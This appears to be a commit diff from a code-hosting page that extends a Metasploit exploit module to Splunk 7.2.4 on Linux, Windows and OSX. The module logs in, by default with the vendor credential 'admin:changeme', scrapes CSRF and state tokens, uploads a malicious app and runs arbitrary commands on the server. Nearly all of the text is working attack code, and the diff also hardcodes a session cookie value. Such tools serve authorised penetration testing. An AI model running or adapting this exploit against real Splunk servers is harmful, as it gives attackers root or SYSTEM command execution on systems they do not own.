added splunk 7.2.4 support
parent
4af2b87a79
commit
7a31fc2d17
|
@ -20,13 +20,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
role is required. By default, this module uses the credential of "admin:changeme",
|
||||
the default Administrator credential for Splunk. Note that the Splunk web interface
|
||||
runs as SYSTEM on Windows, or as root on Linux by default. This module has been
|
||||
tested successfully against Splunk 5.0, 6.1, and 6.1.1.',
|
||||
tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4.
|
||||
Version 7.2.4 has been tested successfully against OSX as well',
|
||||
'Author' =>
|
||||
[
|
||||
"marcwickenden", # discovery and metasploit module
|
||||
"sinn3r", # metasploit module
|
||||
"juan vazquez", # metasploit module
|
||||
"Gary Blosser" # metasploit module updates for Splunk 6.1
|
||||
"Gary Blosser", # metasploit module updates for Splunk 6.1
|
||||
"Matteo Malvica" # metasploit module updates for Splunk 7.2.4
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -40,9 +42,27 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Space' => 1024,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => %w(linux unix win),
|
||||
'Platform' => %w(linux unix win osx),
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Splunk >= 7.2.4 / Linux',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => %w(linux unix)
|
||||
}
|
||||
],
|
||||
[ 'Splunk >= 7.2.4 / Windows',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
[ 'Splunk >= 7.2.4 / OSX',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => %w(linux unix)
|
||||
}
|
||||
],
|
||||
[ 'Splunk >= 5.0.1 / Linux',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
|
@ -96,28 +116,73 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# set up some variables for later use
|
||||
@auth_cookies = ''
|
||||
@csrf_form_key = ''
|
||||
@state_token = ''
|
||||
@splunkweb_csrf_token_8000_id = ''
|
||||
@csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below.
|
||||
@ver7 = false # splunk version 7 boolean
|
||||
|
||||
app_name = 'upload_app_exec'
|
||||
p = payload.encoded
|
||||
print_status("Using command: #{p}")
|
||||
cmd = Rex::Text.encode_base64(p)
|
||||
|
||||
# log in to Splunk (if required)
|
||||
# check if the target version is 7.2.4
|
||||
if target.name.include? "7.2.4"
|
||||
@ver7 = true
|
||||
end
|
||||
|
||||
do_login
|
||||
|
||||
# fetch the csrf token for use in the upload next
|
||||
if @ver7 == true
|
||||
do_get_state_token('/en-US/manager/appinstall/_upload')
|
||||
else
|
||||
do_get_csrf('/en-US/manager/launcher/apps/local')
|
||||
end
|
||||
|
||||
unless disable_upload
|
||||
# upload the arbitrary command execution Splunk app tgz
|
||||
if @ver7 == true
|
||||
do_upload_app_7(app_name, file_name)
|
||||
else
|
||||
do_upload_app(app_name, file_name)
|
||||
end
|
||||
end
|
||||
|
||||
if @ver7 == false
|
||||
# get the next csrf token from our new app
|
||||
do_get_csrf("/en-US/app/#{app_name}/flashtimeline")
|
||||
end
|
||||
|
||||
# call our command execution function with the Splunk 'script' command
|
||||
print_status("Invoking script command")
|
||||
if @ver7 == true
|
||||
res = send_request_cgi(
|
||||
'uri' => '/en-US/splunkd/__raw/servicesNS/admin/search/search/jobs',
|
||||
'method' => 'POST',
|
||||
'cookie' => "#{@auth_cookies};", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
|
||||
'headers' =>
|
||||
{
|
||||
'X-Requested-With' => 'XMLHttpRequest',
|
||||
'X-Splunk-Form-Key' => @splunkweb_csrf_token_8000_id # Version 6 ignores extra headers (verified)
|
||||
},
|
||||
'vars_post' =>
|
||||
{
|
||||
'search' => "search * | script msf_exec #{cmd}", # msf_exec defined in default/commands.conf
|
||||
'status_buckets' => "300",
|
||||
'namespace' => "#{app_name}",
|
||||
'ui_dispatch_app' => "#{app_name}",
|
||||
'ui_dispatch_view' => "flashtimeline",
|
||||
'auto_cancel' => "100",
|
||||
'wait' => "0",
|
||||
'required_field_list' => "*",
|
||||
'adhoc_search_level' => "smart",
|
||||
'earliest_time' => "0",
|
||||
'latest_time' => "",
|
||||
'timeFormat' => "%s.%Q"
|
||||
}
|
||||
)
|
||||
else
|
||||
res = send_request_cgi(
|
||||
'uri' => '/en-US/api/search/jobs',
|
||||
'method' => 'POST',
|
||||
|
@ -143,11 +208,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'timeFormat' => "%s.%Q"
|
||||
}
|
||||
)
|
||||
end
|
||||
|
||||
if return_output
|
||||
if ver7 == true
|
||||
res.body.match('sid.*')
|
||||
job_id_blob = Regexp.last_match(0)
|
||||
job_id_blob2 = job_id_blob.split('>')[1]
|
||||
job_id = job_id_blob2.split('<')[0]
|
||||
else
|
||||
res.body.match(/data":\ "([0-9.]+)"/)
|
||||
job_id = Regexp.last_match(1)
|
||||
|
||||
end
|
||||
# wait a short time to let the output be produced
|
||||
print_status("Waiting for #{command_output_delay} seconds to retrieve command output")
|
||||
select(nil, nil, nil, command_output_delay)
|
||||
|
@ -231,6 +303,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
if !res
|
||||
fail_with(Failure::Unreachable, "No response")
|
||||
elsif res.code != 200
|
||||
fail_with(Failure::Unreachable, "Authentication failed")
|
||||
|
||||
elsif @ver7 == true
|
||||
splunkweb_csrf_token_8000_port = ''
|
||||
@splunkweb_csrf_token_8000_id = ''
|
||||
splunkd_8000_port = ''
|
||||
splunkd_8000_id = ''
|
||||
|
||||
#puts res
|
||||
res.get_cookies.split(';').each do |c|
|
||||
c.split(',').each do |v|
|
||||
if v.split('=')[0] =~ /splunkweb_csrf_token_8000/
|
||||
splunkweb_csrf_token_8000_port = v.split('=')[0]
|
||||
@splunkweb_csrf_token_8000_id = v.split('=')[1]
|
||||
elsif v.split('=')[0] =~ /splunkd_8000/ # regex as the full name is something like splunkweb_csrf_token_8000
|
||||
splunkd_8000_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
|
||||
splunkd_8000_id = v.split('=')[1]
|
||||
end
|
||||
end
|
||||
@auth_cookies = "session_id_8000=37305a4fb182fadd28a1591b64a0b22b0765159e;#{splunkweb_csrf_token_8000_port}=#{@splunkweb_csrf_token_8000_id};#{splunkd_8000_port}=#{splunkd_8000_id}; splunkweb_uid=30A93112-7681-4C0D-B1F6-17CAB1FA2735;login=true"
|
||||
end
|
||||
|
||||
else
|
||||
session_id_port = ''
|
||||
session_id = ''
|
||||
|
@ -249,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def do_upload_app(app_name, file_name)
|
||||
archive_file_name = ::File.basename(file_name)
|
||||
print_status("Uploading file #{archive_file_name}")
|
||||
file_data = ::File.open(file_name, "rb") { |f| f.read }
|
||||
file_data = ::File.read(file_name)
|
||||
|
||||
boundary = '--------------' + rand_text_alphanumeric(6)
|
||||
|
||||
|
@ -286,6 +381,48 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
# version 7.2.x only
|
||||
def do_upload_app_7(app_name, file_name)
|
||||
archive_file_name = ::File.basename(file_name)
|
||||
print_status("Uploading file #{archive_file_name}")
|
||||
file_data = ::File.read(file_name)
|
||||
|
||||
boundary = '---------------------------' + rand_text_numeric(29)
|
||||
|
||||
data = "--#{boundary}\r\n"
|
||||
data << "Content-Disposition: form-data; name=\"state\"\r\n"
|
||||
data << "\r\n#{@state_token}\r\n"
|
||||
|
||||
data << "--#{boundary}\r\n"
|
||||
data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n"
|
||||
data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n"
|
||||
|
||||
data << "--#{boundary}\r\n"
|
||||
data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n"
|
||||
data << "Content-Type: application/x-compressed-tar\r\n\r\n"
|
||||
data << file_data
|
||||
data << "\r\n--#{boundary}\r\n"
|
||||
|
||||
data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n"
|
||||
data << "1"
|
||||
data << "\r\n--#{boundary}--\r\n"
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => '/en-US/manager/appinstall/_upload',
|
||||
'method' => 'POST',
|
||||
'cookie' => "#{@auth_cookies};",
|
||||
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||
'data' => data
|
||||
}, 30)
|
||||
|
||||
if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))
|
||||
print_good("#{app_name} successfully uploaded")
|
||||
else
|
||||
fail_with(Failure::Unknown, "Error uploading")
|
||||
end
|
||||
end
|
||||
|
||||
def do_get_csrf(uri)
|
||||
print_status("Fetching csrf token from #{uri}")
|
||||
res = send_request_cgi(
|
||||
|
@ -306,10 +443,27 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
fail_with(Failure::Unknown, "csrf form Key not found") unless @csrf_form_key
|
||||
end
|
||||
|
||||
# version 7.2.x only
|
||||
def do_get_state_token(uri)
|
||||
print_status("Fetching state token from #{uri}")
|
||||
res = send_request_cgi(
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
'cookie' => @auth_cookies
|
||||
)
|
||||
#puts res
|
||||
res.body.match('name=\"state\" value="(.*)"') # Version 5
|
||||
@state_token = Regexp.last_match(1)
|
||||
|
||||
unless @state_token
|
||||
fail_with(Failure::Unknown, "state token form Key not found") unless @state_token
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
def fetch_job_output(job_id)
|
||||
# fetch the output of our job id as csv for easy parsing
|
||||
print_status("Fetching job_output for id #{job_id}")
|
||||
|
|
Loading…
Reference in New Issue